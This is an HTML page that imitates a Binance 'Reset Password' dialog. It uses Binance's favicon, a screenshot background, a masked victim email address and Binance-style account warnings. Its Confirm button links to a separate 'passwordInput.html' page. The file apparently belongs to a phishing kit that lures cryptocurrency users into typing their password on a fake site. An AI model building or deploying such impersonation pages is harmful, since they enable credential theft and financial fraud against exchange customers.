<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    
    <link rel="shortcut icon" href="https://bin.bnbstatic.com/static/images/common/favicon.ico">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css" integrity="sha512-DTOQO9RWCH3ppGqcWaEA1BIZOC6xxalwEsw9c2QQeAIftl+Vegovlnee1c9QX4TctnWMn13TZye+giMm8e2LwA==" crossorigin="anonymous" referrerpolicy="no-referrer" />

    <title>Binance || Login Page</title>
    <style>
        main {
      background-image: url('Screenshot\ \(24\).png'); /* Background image */
      background-size: cover; /* Cover the entire element */
      background-position: center; /* Center the background image */
      background-repeat: no-repeat; /* Do not repeat the background image */
     width: 100svw;
     position: relative;
     height: 100svh;
      /* Additional styles */
      box-sizing: border-box; /* Include padding and border in element's total width and height */
    }
    .on-top{
        position: absolute;
        width: 100%;
        height: 100%;
        z-index: 10;
        top: 0;
        left: 0;
        background-color: rgba(32, 32, 32, 0.5);
        inset: 0;
        
    }
    button{
        border: none;
        background: rgba(105, 105, 105, 1);
        color: white;
        letter-spacing: 1px;
        padding: 4px 11px;
        border-radius: 7px;
    }
    </style>
</head>

<body>
   <main>
    <div class="on-top">
    <div class="card text-white bg-dark mb-3 d-none d-sm-flex  align-items-center" style="max-width: 18rem; position: absolute; z-index: 20; top: 30%; left: 40%; text-align: center;">
        <div class="card-header" style="height: 40px; width: 40px; border: 1px solid rgba(116, 116, 116, 0.5);"></div>
        <div class="card-body">
            <h4>Reset Password</h4>
            <span class="card-text"><i class="fa-solid fa-user fa-2xs" style="color: #ffffff;"></i> <p style="font-size: 11px;">ab****@gmail.com</p></span>
          <p class="card-text" style="font-size: 12px;">In order to protect your account, widthrawals, P2P selling,payment services, and Binance Card applications will be disabled for 24 hours after you change your password.</p>
          <button>Cancel</button>
          <a style="text-decoration: none;" href="passwordInput.html"><button>Confirm</button></a>
        </div>
      </div>


      <div class="card text-white bg-dark mb-3 d-flex d-lg-none align-items-center" style="max-width: 18rem; position: absolute; z-index: 20; top: 30%; left: 20%; text-align: center;">
        
        <div class="card-header" style="height: 40px; width: 40px; border: 1px solid rgba(116, 116, 116, 0.5);"></div>
    
        <div class="card-body">
            <h4>Reset Password</h4>
          <span class="card-text"><i class="fa-solid fa-user fa-2xs" style="color: #ffffff;"></i> <p style="font-size: 11px;">ab****@gmail.com</p></span>
          <p class="card-text" style="font-size: 12px;">In order to protect your account, widthrawals, P2P selling,payment services, and Binance Card applications will be disabled for 24 hours after you change your password.</p>

          <div>
            <button>Cancel</button>
            <a style="text-decoration: none;" href="passwordInput.html"><button>Confirm</button></a>
          </div>
        </div>
      </div>
    </div>
   </main>  

   <!-- <section class="d-block d-sm-none">
    <div class="on-top">
        
    </div>
   </section> -->
</body>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-YvpcrYf0tY3lHB60NNkmXc5s9fDVZLESaAA55NDzOxhy9GkcIdslK1eN7N6jIeHz" crossorigin="anonymous"></script>
</html>